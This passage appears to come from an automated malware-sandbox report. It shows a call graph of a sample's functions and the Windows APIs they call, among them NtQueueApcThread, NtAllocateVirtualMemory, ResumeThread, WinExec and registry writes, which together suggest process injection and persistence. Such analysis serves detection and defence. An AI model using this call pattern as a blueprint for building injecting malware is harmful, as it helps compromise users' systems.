calls 77119->77122 77123 2ca89d0 20 API calls 77120->77123 77132 2cb7bf5 77121->77132 77133 2cb87c6 77122->77133 77126 2cb9d71 77123->77126 77127 2cb874a 77124->77127 77129 2ca89d0 20 API calls 77125->77129 77128 2c94860 11 API calls 77126->77128 77130 2cb8755 77127->77130 77137 2cb9d92 77128->77137 77131 2cb95bb 77129->77131 77138 2ca89d0 20 API calls 77130->77138 77134 2c94860 11 API calls 77131->77134 77135 2ca89d0 20 API calls 77132->77135 77136 2ca89d0 20 API calls 77133->77136 77144 2cb95dc 77134->77144 77139 2cb7c19 77135->77139 77140 2cb87ea 77136->77140 77143 2c947ec 11 API calls 77137->77143 77138->77107 77141 2c94860 11 API calls 77139->77141 77142 2c94860 11 API calls 77140->77142 77146 2cb7c3a 77141->77146 77147 2cb880b 77142->77147 77148 2cb9dc9 77143->77148 77145 2c947ec 11 API calls 77144->77145 77152 2cb9613 77145->77152 77149 2c947ec 11 API calls 77146->77149 77150 2c947ec 11 API calls 77147->77150 77151 2ca89d0 20 API calls 77148->77151 77157 2cb7c71 77149->77157 77158 2cb8842 77150->77158 77153 2cb9ded 77151->77153 77155 2ca89d0 20 API calls 77152->77155 77154 2c94860 11 API calls 77153->77154 77162 2cb9e0e 77154->77162 77156 2cb9637 77155->77156 77159 2c94860 11 API calls 77156->77159 77160 2ca89d0 20 API calls 77157->77160 77161 2ca89d0 20 API calls 77158->77161 77166 2cb9658 77159->77166 77163 2cb7c95 77160->77163 77164 2cb8866 77161->77164 77165 2c947ec 11 API calls 77162->77165 77168 2c94860 11 API calls 77163->77168 77736 2c949f8 77164->77736 77171 2cb9e45 77165->77171 77170 2c947ec 11 API calls 77166->77170 77173 2cb7cd5 77168->77173 77169 2cb888a 77172 2c94860 11 API calls 77169->77172 77176 2cb968f 77170->77176 77174 2ca89d0 20 API calls 77171->77174 77175 2cb88b9 77172->77175 77177 2c947ec 11 API calls 77173->77177 77180 2cb9e69 77174->77180 77181 2cb88c4 77175->77181 77178 2ca89d0 20 API calls 77176->77178 77185 2cb7d0c 77177->77185 77179 2cb96b3 77178->77179 77906 2caf094 77179->77906 77186 2ca89d0 20 API calls 77180->77186 77183 
2c947ec 11 API calls 77181->77183 77187 2cb88f0 77183->77187 77189 2ca89d0 20 API calls 77185->77189 77192 2cb9e9c 77186->77192 77193 2cb88fb 77187->77193 77188 2c94860 11 API calls 77194 2cb96f7 77188->77194 77190 2cb7d30 77189->77190 77191 2c94860 11 API calls 77190->77191 77200 2cb7d51 77191->77200 77196 2ca89d0 20 API calls 77192->77196 77195 2ca89d0 20 API calls 77193->77195 77199 2c94860 11 API calls 77194->77199 77197 2cb8914 77195->77197 77202 2cb9ecf 77196->77202 77198 2c94860 11 API calls 77197->77198 77204 2cb8935 77198->77204 77203 2cb972f 77199->77203 77201 2c947ec 11 API calls 77200->77201 77208 2cb7d88 77201->77208 77205 2ca89d0 20 API calls 77202->77205 77206 2c947ec 11 API calls 77203->77206 77207 2c947ec 11 API calls 77204->77207 77210 2cb9f02 77205->77210 77211 2cb9766 77206->77211 77213 2cb896c 77207->77213 77209 2ca89d0 20 API calls 77208->77209 77212 2cb7dac 77209->77212 77215 2ca89d0 20 API calls 77210->77215 77216 2ca89d0 20 API calls 77211->77216 77214 2c94860 11 API calls 77212->77214 77218 2ca89d0 20 API calls 77213->77218 77224 2cb7dcd 77214->77224 77217 2cb9f35 77215->77217 77219 2cb978a 77216->77219 77220 2c94860 11 API calls 77217->77220 77221 2cb8990 77218->77221 77222 2c94860 11 API calls 77219->77222 77225 2cb9f56 77220->77225 77223 2c94860 11 API calls 77221->77223 77228 2cb97ab 77222->77228 77227 2cb89b1 77223->77227 77226 2c947ec 11 API calls 77224->77226 77229 2c947ec 11 API calls 77225->77229 77232 2cb7e04 77226->77232 77231 2c947ec 11 API calls 77227->77231 77230 2c947ec 11 API calls 77228->77230 77234 2cb9f8d 77229->77234 77235 2cb97e2 77230->77235 77237 2cb89e8 77231->77237 77233 2ca89d0 20 API calls 77232->77233 77236 2cb7e28 77233->77236 77239 2ca89d0 20 API calls 77234->77239 77240 2ca89d0 20 API calls 77235->77240 77903 2ca5aec 42 API calls 77236->77903 77243 2ca89d0 20 API calls 77237->77243 77242 2cb9fb1 77239->77242 77244 2cb9806 77240->77244 77246 2c94860 11 API calls 77242->77246 77247 2cb8a0c 77243->77247 77913 
2c97e5c 77244->77913 77245 2cb7e54 77254 2c94bcc 11 API calls 77245->77254 77259 2cb9fd2 77246->77259 77742 2cad164 77247->77742 77252 2cb9818 77256 2c94860 11 API calls 77252->77256 77253 2cb9aef 77257 2c94860 11 API calls 77253->77257 77258 2cb7e69 77254->77258 77255 2c94860 11 API calls 77262 2cb8a46 77255->77262 77263 2cb9839 77256->77263 77264 2cb9b10 77257->77264 77260 2c94860 11 API calls 77258->77260 77261 2c947ec 11 API calls 77259->77261 77265 2cb7e8a 77260->77265 77269 2cba009 77261->77269 77266 2c947ec 11 API calls 77262->77266 77267 2c947ec 11 API calls 77263->77267 77268 2c947ec 11 API calls 77264->77268 77270 2c947ec 11 API calls 77265->77270 77273 2cb8a7d 77266->77273 77274 2cb9870 77267->77274 77275 2cb9b47 77268->77275 77271 2ca89d0 20 API calls 77269->77271 77277 2cb7ec1 77270->77277 77272 2cba02d 77271->77272 77276 2c94860 11 API calls 77272->77276 77278 2ca89d0 20 API calls 77273->77278 77279 2ca89d0 20 API calls 77274->77279 77280 2ca89d0 20 API calls 77275->77280 77289 2cba04e 77276->77289 77284 2ca89d0 20 API calls 77277->77284 77281 2cb8aa1 77278->77281 77282 2cb9894 77279->77282 77283 2cb9b6b 77280->77283 77285 2c94860 11 API calls 77281->77285 77286 2c94860 11 API calls 77282->77286 77287 2c94860 11 API calls 77283->77287 77288 2cb7ee5 77284->77288 77291 2cb8ac2 77285->77291 77295 2cb98b5 77286->77295 77293 2cb9b8c 77287->77293 77292 2c949f8 11 API calls 77288->77292 77290 2c947ec 11 API calls 77289->77290 77301 2cba085 77290->77301 77297 2c947ec 11 API calls 77291->77297 77294 2cb7f02 77292->77294 77299 2c947ec 11 API calls 77293->77299 77904 2ca7e50 17 API calls 77294->77904 77298 2c947ec 11 API calls 77295->77298 77304 2cb8af9 77297->77304 77305 2cb98ec 77298->77305 77306 2cb9bc3 77299->77306 77300 2cb7f08 77302 2c94860 11 API calls 77300->77302 77303 2ca89d0 20 API calls 77301->77303 77307 2cb7f29 77302->77307 77311 2cba0a9 77303->77311 77308 2ca89d0 20 API calls 77304->77308 77309 2ca89d0 20 API calls 77305->77309 77310 2ca89d0 20 
API calls 77306->77310 77315 2c947ec 11 API calls 77307->77315 77312 2cb8b1d 77308->77312 77313 2cb9910 77309->77313 77314 2cb9be7 77310->77314 77319 2ca89d0 20 API calls 77311->77319 77316 2c94860 11 API calls 77312->77316 77317 2c94860 11 API calls 77313->77317 77318 2c94860 11 API calls 77314->77318 77320 2cb7f60 77315->77320 77321 2cb8b3e 77316->77321 77322 2cb9931 77317->77322 77323 2cb9c08 77318->77323 77324 2cba0dc 77319->77324 77326 2ca89d0 20 API calls 77320->77326 77325 2c947ec 11 API calls 77321->77325 77330 2c947ec 11 API calls 77322->77330 77327 2c947ec 11 API calls 77323->77327 77329 2ca89d0 20 API calls 77324->77329 77332 2cb8b75 77325->77332 77328 2cb7f84 77326->77328 77334 2cb9c3f 77327->77334 77331 2c94860 11 API calls 77328->77331 77335 2cba10f 77329->77335 77333 2cb9968 77330->77333 77336 2cb7fa5 77331->77336 77337 2ca89d0 20 API calls 77332->77337 77338 2ca89d0 20 API calls 77333->77338 77339 2ca89d0 20 API calls 77334->77339 77340 2ca89d0 20 API calls 77335->77340 77344 2c947ec 11 API calls 77336->77344 77341 2cb8b99 77337->77341 77342 2cb998c 77338->77342 77343 2cb9c63 77339->77343 77352 2cba142 77340->77352 77345 2cb8bb9 77341->77345 77878 2ca8730 77341->77878 77917 2cae358 77342->77917 77347 2c94860 11 API calls 77343->77347 77354 2cb7fdc 77344->77354 77349 2c94860 11 API calls 77345->77349 77356 2cb9c84 77347->77356 77358 2cb8bda 77349->77358 77351 2c94530 11 API calls 77353 2cb99b1 77351->77353 77357 2ca89d0 20 API calls 77352->77357 77355 2c94860 11 API calls 77353->77355 77359 2ca89d0 20 API calls 77354->77359 77365 2cb99d2 77355->77365 77361 2c947ec 11 API calls 77356->77361 77364 2cba175 77357->77364 77360 2c947ec 11 API calls 77358->77360 77362 2cb8000 77359->77362 77369 2cb8c11 77360->77369 77367 2cb9cbb 77361->77367 77363 2c94860 11 API calls 77362->77363 77370 2cb8021 77363->77370 77368 2ca89d0 20 API calls 77364->77368 77366 2c947ec 11 API calls 77365->77366 77378 2cb9a09 77366->77378 77372 2ca89d0 20 API calls 77367->77372 77371 
2cba1a8 77368->77371 77374 2ca89d0 20 API calls 77369->77374 77376 2c947ec 11 API calls 77370->77376 77373 2c94860 11 API calls 77371->77373 77375 2cb9cdf 77372->77375 77384 2cba1c9 77373->77384 77377 2cb8c35 77374->77377 77379 2c949f8 11 API calls 77375->77379 77386 2cb8058 77376->77386 77380 2c94860 11 API calls 77377->77380 77382 2ca89d0 20 API calls 77378->77382 77381 2cb9ce9 77379->77381 77389 2cb8c56 77380->77389 77937 2ca8d70 31 API calls 77381->77937 77385 2cb9a2d 77382->77385 77388 2c947ec 11 API calls 77384->77388 77387 2c94860 11 API calls 77385->77387 77390 2ca89d0 20 API calls 77386->77390 77394 2cb9a4e 77387->77394 77395 2cba200 77388->77395 77392 2c947ec 11 API calls 77389->77392 77391 2cb807c 77390->77391 77393 2c94860 11 API calls 77391->77393 77397 2cb8c8d 77392->77397 77399 2cb809d 77393->77399 77398 2c947ec 11 API calls 77394->77398 77396 2ca89d0 20 API calls 77395->77396 77400 2cba224 77396->77400 77402 2ca89d0 20 API calls 77397->77402 77405 2cb9a85 77398->77405 77403 2c947ec 11 API calls 77399->77403 77401 2c94860 11 API calls 77400->77401 77408 2cba245 77401->77408 77404 2cb8cb1 77402->77404 77409 2cb80d4 77403->77409 77406 2c94860 11 API calls 77404->77406 77407 2ca89d0 20 API calls 77405->77407 77411 2cb8cd2 77406->77411 77417 2cb9aa9 77407->77417 77410 2c947ec 11 API calls 77408->77410 77412 2ca89d0 20 API calls 77409->77412 77416 2cba27c 77410->77416 77414 2c947ec 11 API calls 77411->77414 77413 2cb80f8 77412->77413 77905 2cab118 39 API calls 77413->77905 77418 2cb8d09 77414->77418 77420 2ca89d0 20 API calls 77416->77420 77922 2cadc8c 77417->77922 77422 2ca89d0 20 API calls 77418->77422 77424 2cba2a0 77420->77424 77421 2cb8109 77423 2cb8d2d ResumeThread 77422->77423 77425 2c94860 11 API calls 77423->77425 77426 2ca89d0 20 API calls 77424->77426 77429 2cb8d59 77425->77429 77427 2cba2d3 77426->77427 77428 2c94860 11 API calls 77427->77428 77431 2cba2f4 77428->77431 77430 2c947ec 11 API calls 77429->77430 77433 2cb8d90 77430->77433 77432 
2c947ec 11 API calls 77431->77432 77436 2cba32b 77432->77436 77434 2ca89d0 20 API calls 77433->77434 77435 2cb8db4 77434->77435 77437 2c94860 11 API calls 77435->77437 77438 2ca89d0 20 API calls 77436->77438 77441 2cb8dd5 77437->77441 77439 2cba34f 77438->77439 77440 2c94860 11 API calls 77439->77440 77443 2cba370 77440->77443 77442 2c947ec 11 API calls 77441->77442 77445 2cb8e0c 77442->77445 77444 2c947ec 11 API calls 77443->77444 77449 2cba3a7 77444->77449 77446 2ca89d0 20 API calls 77445->77446 77447 2cb8e30 77446->77447 77448 2c94860 11 API calls 77447->77448 77453 2cb8e51 77448->77453 77450 2ca89d0 20 API calls 77449->77450 77451 2cba3cb 77450->77451 77452 2c94860 11 API calls 77451->77452 77455 2cba3ec 77452->77455 77454 2c947ec 11 API calls 77453->77454 77457 2cb8e88 77454->77457 77456 2c947ec 11 API calls 77455->77456 77460 2cba423 77456->77460 77458 2ca89d0 20 API calls 77457->77458 77459 2cb8eac CloseHandle 77458->77459 77461 2c94860 11 API calls 77459->77461 77462 2ca89d0 20 API calls 77460->77462 77463 2cb8ed8 77461->77463 77464 2cba447 77462->77464 77465 2c947ec 11 API calls 77463->77465 77466 2ca89d0 20 API calls 77464->77466 77467 2cb8f0f 77465->77467 77468 2cba47a 77466->77468 77469 2ca89d0 20 API calls 77467->77469 77471 2ca89d0 20 API calls 77468->77471 77470 2cb8f33 77469->77470 77472 2c94860 11 API calls 77470->77472 77474 2cba4ad 77471->77474 77473 2cb8f54 77472->77473 77476 2c947ec 11 API calls 77473->77476 77475 2ca89d0 20 API calls 77474->77475 77477 2cba4e0 77475->77477 77478 2cb8f8b 77476->77478 77479 2ca89d0 20 API calls 77477->77479 77480 2ca89d0 20 API calls 77478->77480 77481 2cba513 77479->77481 77482 2cb8faf 77480->77482 77483 2c94860 11 API calls 77481->77483 77484 2c94860 11 API calls 77482->77484 77485 2cba534 77483->77485 77486 2cb8fd0 77484->77486 77488 2c947ec 11 API calls 77485->77488 77487 2c947ec 11 API calls 77486->77487 77490 2cb9007 77487->77490 77489 2cba56b 77488->77489 77491 2ca89d0 20 API calls 77489->77491 77492 
2ca89d0 20 API calls 77490->77492 77493 2cba58f 77491->77493 77494 2cb902b 77492->77494 77495 2c94860 11 API calls 77493->77495 77496 2c94860 11 API calls 77494->77496 77497 2cba5b0 77495->77497 77498 2cb904c 77496->77498 77499 2c947ec 11 API calls 77497->77499 77500 2c947ec 11 API calls 77498->77500 77501 2cba5e7 77499->77501 77502 2cb9083 77500->77502 77503 2ca89d0 20 API calls 77501->77503 77504 2ca89d0 20 API calls 77502->77504 77507 2cba60b 77503->77507 77505 2cb90a7 77504->77505 77506 2c94860 11 API calls 77505->77506 77509 2cb90c8 77506->77509 77508 2ca89d0 20 API calls 77507->77508 77512 2cba63e 77508->77512 77510 2c947ec 11 API calls 77509->77510 77511 2cb90ff 77510->77511 77514 2ca89d0 20 API calls 77511->77514 77513 2ca89d0 20 API calls 77512->77513 77516 2cba671 77513->77516 77515 2cb9123 77514->77515 77517 2c94860 11 API calls 77515->77517 77518 2ca89d0 20 API calls 77516->77518 77519 2cb9144 77517->77519 77520 2cba6a4 77518->77520 77521 2c947ec 11 API calls 77519->77521 77522 2ca89d0 20 API calls 77520->77522 77523 2cb917b 77521->77523 77525 2cba6d7 77522->77525 77524 2ca89d0 20 API calls 77523->77524 77526 2cb919f 77524->77526 77527 2ca89d0 20 API calls 77525->77527 77528 2c94860 11 API calls 77526->77528 77529 2cba70a 77527->77529 77531 2cb91c0 77528->77531 77530 2c94860 11 API calls 77529->77530 77532 2cba72b 77530->77532 77533 2c947ec 11 API calls 77531->77533 77534 2c947ec 11 API calls 77532->77534 77535 2cb91f7 77533->77535 77536 2cba762 77534->77536 77537 2ca89d0 20 API calls 77535->77537 77539 2ca89d0 20 API calls 77536->77539 77538 2cb921b 77537->77538 77883 2ca894c LoadLibraryW 77538->77883 77540 2cba786 77539->77540 77541 2c94860 11 API calls 77540->77541 77546 2cba7a7 77541->77546 77544 2ca894c 21 API calls 77545 2cb924e 77544->77545 77547 2ca894c 21 API calls 77545->77547 77549 2c947ec 11 API calls 77546->77549 77548 2cb9262 77547->77548 77550 2ca894c 21 API calls 77548->77550 77554 2cba7de 77549->77554 77551 2cb9276 77550->77551 77552 
2ca894c 21 API calls 77551->77552 77553 2cb928a 77552->77553 77555 2ca894c 21 API calls 77553->77555 77557 2ca89d0 20 API calls 77554->77557 77556 2cb929e CloseHandle 77555->77556 77558 2c94860 11 API calls 77556->77558 77559 2cba802 77557->77559 77561 2cb92ca 77558->77561 77560 2c94860 11 API calls 77559->77560 77562 2cba823 77560->77562 77563 2c947ec 11 API calls 77561->77563 77564 2c947ec 11 API calls 77562->77564 77565 2cb9301 77563->77565 77566 2cba85a 77564->77566 77567 2ca89d0 20 API calls 77565->77567 77569 2ca89d0 20 API calls 77566->77569 77568 2cb9325 77567->77568 77570 2c94860 11 API calls 77568->77570 77571 2cba87e 77569->77571 77573 2cb9346 77570->77573 77572 2c94860 11 API calls 77571->77572 77574 2cba89f 77572->77574 77575 2c947ec 11 API calls 77573->77575 77576 2c947ec 11 API calls 77574->77576 77577 2cb937d 77575->77577 77578 2cba8d6 77576->77578 77579 2ca89d0 20 API calls 77577->77579 77580 2ca89d0 20 API calls 77578->77580 77579->77037 77581 2cba8fa 77580->77581 77582 2c94860 11 API calls 77581->77582 77583 2cba91b 77582->77583 77584 2c947ec 11 API calls 77583->77584 77585 2cba952 77584->77585 77586 2ca89d0 20 API calls 77585->77586 77587 2cba976 77586->77587 77588 2ca89d0 20 API calls 77587->77588 77589 2cba985 77588->77589 77590 2ca89d0 20 API calls 77589->77590 77591 2cba994 77590->77591 77592 2ca89d0 20 API calls 77591->77592 77593 2cba9a3 77592->77593 77594 2ca89d0 20 API calls 77593->77594 77595 2cba9b2 77594->77595 77596 2ca89d0 20 API calls 77595->77596 77597 2cba9c1 77596->77597 77598 2ca89d0 20 API calls 77597->77598 77599 2cba9d0 77598->77599 77600 2ca89d0 20 API calls 77599->77600 77601 2cba9df 77600->77601 77602 2ca89d0 20 API calls 77601->77602 77603 2cba9ee 77602->77603 77604 2ca89d0 20 API calls 77603->77604 77605 2cba9fd 77604->77605 77606 2ca89d0 20 API calls 77605->77606 77607 2cbaa0c 77606->77607 77608 2ca89d0 20 API calls 77607->77608 77609 2cbaa1b 77608->77609 77610 2ca89d0 20 API calls 77609->77610 77611 2cbaa2a 
77610->77611 77612 2ca89d0 20 API calls 77611->77612 77613 2cbaa39 77612->77613 77614 2ca89d0 20 API calls 77613->77614 77615 2cbaa48 77614->77615 77616 2ca89d0 20 API calls 77615->77616 77617 2cbaa57 77616->77617 77618 2c94860 11 API calls 77617->77618 77619 2cbaa78 77618->77619 77620 2c947ec 11 API calls 77619->77620 77621 2cbaaaf 77620->77621 77622 2ca89d0 20 API calls 77621->77622 77623 2cbaad3 77622->77623 77624 2ca89d0 20 API calls 77623->77624 77625 2cbab06 77624->77625 77626 2ca89d0 20 API calls 77625->77626 77627 2cbab39 77626->77627 77628 2ca89d0 20 API calls 77627->77628 77629 2cbab6c 77628->77629 77630 2ca89d0 20 API calls 77629->77630 77631 2cbab9f 77630->77631 77632 2ca89d0 20 API calls 77631->77632 77633 2cbabd2 77632->77633 77634 2ca89d0 20 API calls 77633->77634 77635 2cbac05 77634->77635 77636 2ca89d0 20 API calls 77635->77636 77637 2cbac38 77636->77637 77638 2c94860 11 API calls 77637->77638 77639 2cbac59 77638->77639 77640 2c947ec 11 API calls 77639->77640 77641 2cbac90 77640->77641 77642 2ca89d0 20 API calls 77641->77642 77643 2cbacb4 77642->77643 77644 2c94860 11 API calls 77643->77644 77645 2cbacd5 77644->77645 77646 2c947ec 11 API calls 77645->77646 77647 2cbad0c 77646->77647 77648 2ca89d0 20 API calls 77647->77648 77649 2cbad30 77648->77649 77650 2c94860 11 API calls 77649->77650 77651 2cbad51 77650->77651 77652 2c947ec 11 API calls 77651->77652 77653 2cbad88 77652->77653 77654 2ca89d0 20 API calls 77653->77654 77655 2cbadac 77654->77655 77656 2ca89d0 20 API calls 77655->77656 77657 2cbaddf 77656->77657 77658 2ca89d0 20 API calls 77657->77658 77659 2cbae12 77658->77659 77660 2ca89d0 20 API calls 77659->77660 77661 2cbae45 77660->77661 77662 2ca89d0 20 API calls 77661->77662 77663 2cbae78 77662->77663 77664 2ca89d0 20 API calls 77663->77664 77665 2cbaeab 77664->77665 77666 2ca89d0 20 API calls 77665->77666 77667 2cbaede 77666->77667 77668 2ca89d0 20 API calls 77667->77668 77669 2cbaf11 77668->77669 77670 2ca89d0 20 API calls 77669->77670 
77671 2cbaf44 77670->77671 77672 2ca89d0 20 API calls 77671->77672 77673 2cbaf77 77672->77673 77674 2ca89d0 20 API calls 77673->77674 77675 2cbafaa 77674->77675 77676 2ca89d0 20 API calls 77675->77676 77677 2cbafdd 77676->77677 77678 2ca89d0 20 API calls 77677->77678 77679 2cbb010 77678->77679 77680 2ca89d0 20 API calls 77679->77680 77681 2cbb043 77680->77681 77682 2ca89d0 20 API calls 77681->77682 77683 2cbb076 77682->77683 77684 2ca89d0 20 API calls 77683->77684 77685 2cbb0a9 77684->77685 77686 2ca89d0 20 API calls 77685->77686 77687 2cbb0dc 77686->77687 77688 2ca89d0 20 API calls 77687->77688 77689 2cbb10f 77688->77689 77690 2ca89d0 20 API calls 77689->77690 77691 2cbb142 77690->77691 77692 2ca89d0 20 API calls 77691->77692 77693 2cbb175 77692->77693 77694 2ca8338 18 API calls 77693->77694 77695 2cbb184 77694->77695 77696 2c94860 11 API calls 77695->77696 77697 2cbb1a5 77696->77697 77698 2c947ec 11 API calls 77697->77698 77699 2cbb1dc 77698->77699 77700 2ca89d0 20 API calls 77699->77700 77701 2cbb200 77700->77701 77702 2c94860 11 API calls 77701->77702 77703 2cbb221 77702->77703 77704 2c947ec 11 API calls 77703->77704 77705 2cbb258 77704->77705 77706 2ca89d0 20 API calls 77705->77706 77707 2cbb27c 77706->77707 77708 2c94860 11 API calls 77707->77708 77709 2cbb29d 77708->77709 77710 2c947ec 11 API calls 77709->77710 77711 2cbb2d4 77710->77711 77712 2ca89d0 20 API calls 77711->77712 77713 2cbb2f8 ExitProcess 77712->77713 77720 2cae114 77714->77720 77715 2cae197 77716 2c944dc 11 API calls 77715->77716 77717 2cae19f 77716->77717 77719 2c94530 11 API calls 77717->77719 77718 2c949f8 11 API calls 77718->77720 77721 2cae1aa 77719->77721 77720->77715 77720->77718 77722 2c94500 11 API calls 77721->77722 77723 2cae1c4 77722->77723 77723->76927 77725 2caf22b 77724->77725 77726 2caf256 RegOpenKeyA 77725->77726 77727 2caf264 77726->77727 77728 2c949f8 11 API calls 77727->77728 77729 2caf27c 77728->77729 77730 2caf289 RegSetValueExA RegCloseKey 77729->77730 77731 2caf2ad 
77730->77731 77732 2c94500 11 API calls 77731->77732 77733 2caf2ba 77732->77733 77734 2c944dc 11 API calls 77733->77734 77735 2caf2c2 77734->77735 77735->76930 77737 2c949ac 77736->77737 77738 2c949e7 77737->77738 77739 2c945a0 11 API calls 77737->77739 77738->77169 77740 2c949c3 77739->77740 77740->77738 77938 2c92c2c 11 API calls 77740->77938 77743 2cad16d 77742->77743 77743->77743 77744 2c94860 11 API calls 77743->77744 77745 2cad1af 77744->77745 77746 2c947ec 11 API calls 77745->77746 77747 2cad1d4 77746->77747 77748 2ca89d0 20 API calls 77747->77748 77749 2cad1ef 77748->77749 77750 2c94860 11 API calls 77749->77750 77751 2cad208 77750->77751 77752 2c947ec 11 API calls 77751->77752 77753 2cad22d 77752->77753 77754 2ca89d0 20 API calls 77753->77754 77755 2cad248 77754->77755 77756 2c94860 11 API calls 77755->77756 77757 2cad261 77756->77757 77758 2c947ec 11 API calls 77757->77758 77759 2cad286 77758->77759 77760 2ca89d0 20 API calls 77759->77760 77761 2cad2a1 77760->77761 77762 2c94860 11 API calls 77761->77762 77763 2cad2ba 77762->77763 77764 2c947ec 11 API calls 77763->77764 77765 2cad2df 77764->77765 77766 2ca89d0 20 API calls 77765->77766 77767 2cad2fa 77766->77767 77768 2c94860 11 API calls 77767->77768 77769 2cad313 77768->77769 77770 2c947ec 11 API calls 77769->77770 77771 2cad338 77770->77771 77772 2ca89d0 20 API calls 77771->77772 77773 2cad353 77772->77773 77774 2c94860 11 API calls 77773->77774 77775 2cad36c 77774->77775 77776 2c947ec 11 API calls 77775->77776 77777 2cad391 77776->77777 77778 2ca89d0 20 API calls 77777->77778 77779 2cad3ac 77778->77779 77780 2c94860 11 API calls 77779->77780 77781 2cad3c5 77780->77781 77782 2c947ec 11 API calls 77781->77782 77783 2cad3ea 77782->77783 77784 2ca89d0 20 API calls 77783->77784 77785 2cad405 77784->77785 77786 2c94860 11 API calls 77785->77786 77787 2cad421 77786->77787 77788 2c947ec 11 API calls 77787->77788 77789 2cad44c 77788->77789 77790 2ca89d0 20 API calls 77789->77790 77791 2cad470 77790->77791 
77792 2c94860 11 API calls 77791->77792 77793 2cad48c 77792->77793 77794 2c947ec 11 API calls 77793->77794 77795 2cad4bd 77794->77795 77796 2ca89d0 20 API calls 77795->77796 77797 2cad4e1 77796->77797 77798 2cad558 77797->77798 77800 2c94860 11 API calls 77797->77800 77799 2c94860 11 API calls 77798->77799 77801 2cad574 77799->77801 77802 2cad503 77800->77802 77803 2c947ec 11 API calls 77801->77803 77804 2c947ec 11 API calls 77802->77804 77806 2cad5a5 77803->77806 77805 2cad534 77804->77805 77808 2ca89d0 20 API calls 77805->77808 77807 2ca89d0 20 API calls 77806->77807 77809 2cad5c9 77807->77809 77808->77798 77810 2c94860 11 API calls 77809->77810 77811 2cad5e5 77810->77811 77812 2c947ec 11 API calls 77811->77812 77813 2cad616 77812->77813 77814 2ca89d0 20 API calls 77813->77814 77815 2cad63a 77814->77815 77816 2c94860 11 API calls 77815->77816 77817 2cad656 77816->77817 77818 2c947ec 11 API calls 77817->77818 77819 2cad687 77818->77819 77820 2ca89d0 20 API calls 77819->77820 77821 2cad6ab 77820->77821 77822 2c92ee0 2 API calls 77821->77822 77823 2cad6b0 77822->77823 77824 2c94860 11 API calls 77823->77824 77825 2cad6e0 77824->77825 77826 2c947ec 11 API calls 77825->77826 77827 2cad711 77826->77827 77828 2ca89d0 20 API calls 77827->77828 77829 2cad735 77828->77829 77830 2c94860 11 API calls 77829->77830 77831 2cad751 77830->77831 77832 2c947ec 11 API calls 77831->77832 77833 2cad782 77832->77833 77834 2ca89d0 20 API calls 77833->77834 77835 2cad7a6 77834->77835 77939 2ca7a2c 77835->77939 77838 2cad835 77840 2c94860 11 API calls 77838->77840 77839 2c94860 11 API calls 77842 2cad7e0 77839->77842 77841 2cad851 77840->77841 77843 2c947ec 11 API calls 77841->77843 77844 2c947ec 11 API calls 77842->77844 77845 2cad882 77843->77845 77846 2cad811 77844->77846 77847 2ca89d0 20 API calls 77845->77847 77848 2ca89d0 20 API calls 77846->77848 77849 2cad8a6 77847->77849 77848->77838 77850 2c94860 11 API calls 77849->77850 77851 2cad8c2 77850->77851 77852 2c947ec 11 API calls 
77851->77852 77853 2cad8f3 77852->77853 77854 2ca89d0 20 API calls 77853->77854 77855 2cad917 77854->77855 77856 2ca7d78 18 API calls 77855->77856 77857 2cad92f 77856->77857 77858 2c94860 11 API calls 77857->77858 77859 2cad94b 77858->77859 77860 2c947ec 11 API calls 77859->77860 77861 2cad97c 77860->77861 77862 2ca89d0 20 API calls 77861->77862 77863 2cad9a0 77862->77863 77864 2c94860 11 API calls 77863->77864 77865 2cad9bc 77864->77865 77866 2c947ec 11 API calls 77865->77866 77867 2cad9ed 77866->77867 77868 2ca89d0 20 API calls 77867->77868 77869 2cada11 77868->77869 77870 2c94860 11 API calls 77869->77870 77871 2cada2d 77870->77871 77872 2c947ec 11 API calls 77871->77872 77873 2cada5e 77872->77873 77874 2ca89d0 20 API calls 77873->77874 77875 2cada82 77874->77875 77876 2c94500 11 API calls 77875->77876 77877 2cadaa1 77876->77877 77877->77255 77879 2ca81cc 17 API calls 77878->77879 77880 2ca8742 77879->77880 77881 2ca8274 15 API calls 77880->77881 77882 2ca8748 NtQueueApcThread 77881->77882 77882->77345 77884 2ca89bb 77883->77884 77885 2ca8973 GetProcAddress 77883->77885 77884->77544 77886 2ca898d 77885->77886 77887 2ca89b0 FreeLibrary 77885->77887 77888 2ca7d78 18 API calls 77886->77888 77887->77884 77889 2ca89a5 77888->77889 77889->77887 77891 2c94530 11 API calls 77890->77891 77892 2ca85df 77891->77892 77893 2c94860 11 API calls 77892->77893 77894 2ca85fe 77893->77894 77895 2ca81cc 17 API calls 77894->77895 77896 2ca8611 77895->77896 77897 2ca8274 15 API calls 77896->77897 77898 2ca8617 WinExec 77897->77898 77899 2ca8639 77898->77899 77900 2c944dc 11 API calls 77899->77900 77901 2ca8641 77900->77901 77901->77028 77902->77087 77903->77245 77904->77300 77905->77421 77908 2caf0b9 77906->77908 77907 2caf0e5 77910 2c944dc 11 API calls 77907->77910 77908->77907 77953 2c946c4 11 API calls 77908->77953 77954 2c94530 11 API calls 77908->77954 77911 2caf0fa 77910->77911 77911->77188 77955 2c949a0 77913->77955 77916 2c97e71 77916->77252 77916->77253 77918 2c94bcc 11 API 
calls 77917->77918 77919 2cae370 77918->77919 77920 2cae391 77919->77920 77921 2c949f8 11 API calls 77919->77921 77920->77351 77921->77919 77923 2cadca2 77922->77923 77957 2c94f20 77923->77957 77925 2cadcaa 77926 2cadcca RtlDosPathNameToNtPathName_U 77925->77926 77961 2cadbdc 77926->77961 77928 2cadce6 NtCreateFile 77929 2cadd11 77928->77929 77930 2c949f8 11 API calls 77929->77930 77931 2cadd23 NtWriteFile NtClose 77930->77931 77932 2cadd4d 77931->77932 77962 2c94c60 77932->77962 77935 2c944dc 11 API calls 77936 2cadd5d 77935->77936 77936->77253 77937->77098 77938->77738 77940 2c94530 11 API calls 77939->77940 77941 2ca7a51 77940->77941 77942 2ca798c 12 API calls 77941->77942 77943 2ca7a5e 77942->77943 77944 2c947ec 11 API calls 77943->77944 77945 2ca7a6b 77944->77945 77946 2ca81cc 17 API calls 77945->77946 77947 2ca7a7e 77946->77947 77948 2ca8274 15 API calls 77947->77948 77949 2ca7a84 NtAllocateVirtualMemory 77948->77949 77950 2ca7ab5 77949->77950 77951 2c94500 11 API calls 77950->77951 77952 2ca7ac2 77951->77952 77952->77838 77952->77839 77953->77908 77954->77908 77956 2c949a4 GetFileAttributesA 77955->77956 77956->77916 77958 2c94f26 SysAllocStringLen 77957->77958 77959 2c94f3c 77957->77959 77958->77959 77960 2c94c30 77958->77960 77959->77925 77960->77957 77961->77928 77963 2c94c74 77962->77963 77964 2c94c66 SysFreeString 77962->77964 